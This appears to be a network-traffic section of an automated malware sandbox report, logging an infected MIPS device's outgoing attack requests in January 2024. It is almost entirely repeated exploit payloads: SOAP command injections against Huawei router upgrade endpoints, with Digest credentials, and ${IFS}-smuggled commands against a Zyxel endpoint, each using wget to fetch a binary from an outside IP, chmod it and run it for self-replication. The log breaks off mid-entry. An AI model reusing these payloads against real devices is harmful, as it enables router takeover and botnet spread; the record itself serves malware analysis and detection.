                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 73 6b 79 6c 6a 6e 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.152 -l /tmp/linuxxx -r /skyljne.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                        Jan 14, 2024 16:18:59.121028900 CET832OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                        Connection: keep-alive
                                        Accept: */*
                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                        Content-Length: 475
                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 73 6b 79 6c 6a 6e 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.152 -l /tmp/linuxxx -r /skyljne.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                        Jan 14, 2024 16:19:01.328929901 CET832OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                        Connection: keep-alive
                                        Accept: */*
                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                        Content-Length: 475
                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 73 6b 79 6c 6a 6e 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.152 -l /tmp/linuxxx -r /skyljne.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7868192.168.2.1351290122.241.233.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.752063036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7869192.168.2.1338010195.117.76.250443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.752139091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7870192.168.2.135896432.160.102.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.752173901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7871192.168.2.133317457.125.206.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.752221107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7872192.168.2.1343300145.140.212.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.752338886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7873192.168.2.1338320189.103.251.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.752377987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7874192.168.2.1341212183.8.161.88443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.752397060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7875192.168.2.1348354102.232.84.188443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.752439022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7876192.168.2.1337278221.70.153.170443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.752486944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7877192.168.2.1354306106.47.141.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.752516985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7878192.168.2.1355766104.197.36.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.752551079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7879192.168.2.1356254119.68.5.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.752593994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7880192.168.2.134886450.202.113.242443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.752612114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7881192.168.2.13449041.138.65.37443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.752665997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7882192.168.2.1358180140.193.32.232443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.752707958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7883192.168.2.1351490200.40.21.234443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.752756119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7884192.168.2.136023624.240.79.194443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.752789021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7885192.168.2.134800031.1.200.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.752818108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7886192.168.2.1333974163.90.205.30443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.752842903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7887192.168.2.1356122143.12.133.228443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.752964020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7888192.168.2.134789689.161.149.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.752980947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7889192.168.2.135784867.29.1.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.753031969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7890192.168.2.1348074144.145.4.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.753084898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7891192.168.2.133296475.100.126.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.753120899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7892192.168.2.1353660137.128.165.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.753173113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7893192.168.2.1346550186.0.210.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.753221035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7894192.168.2.135065666.237.109.100443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.753242016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7895192.168.2.1347288109.11.241.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.753294945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7896192.168.2.133849077.239.51.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.753319979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7897192.168.2.135896818.107.21.29443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.753362894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7898192.168.2.1341418201.145.97.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.753391027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7899192.168.2.1338070148.30.242.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.753442049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7900192.168.2.13482982.29.200.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.753475904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7901192.168.2.135050089.54.153.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.753526926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7902192.168.2.135697492.204.119.117443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.753571987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7903192.168.2.133748819.93.94.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.753602028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7904192.168.2.1347344138.134.214.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.753623962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7905192.168.2.1335204212.249.12.157443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.753669024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7906192.168.2.135899875.141.104.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.753700018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7907192.168.2.1359084131.165.150.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.753737926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7908192.168.2.1357320189.101.93.222443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.753772020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7909192.168.2.134549276.100.106.202443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.753818989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7910192.168.2.133436240.20.130.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:57.753865004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7911192.168.2.134540899.109.254.200443
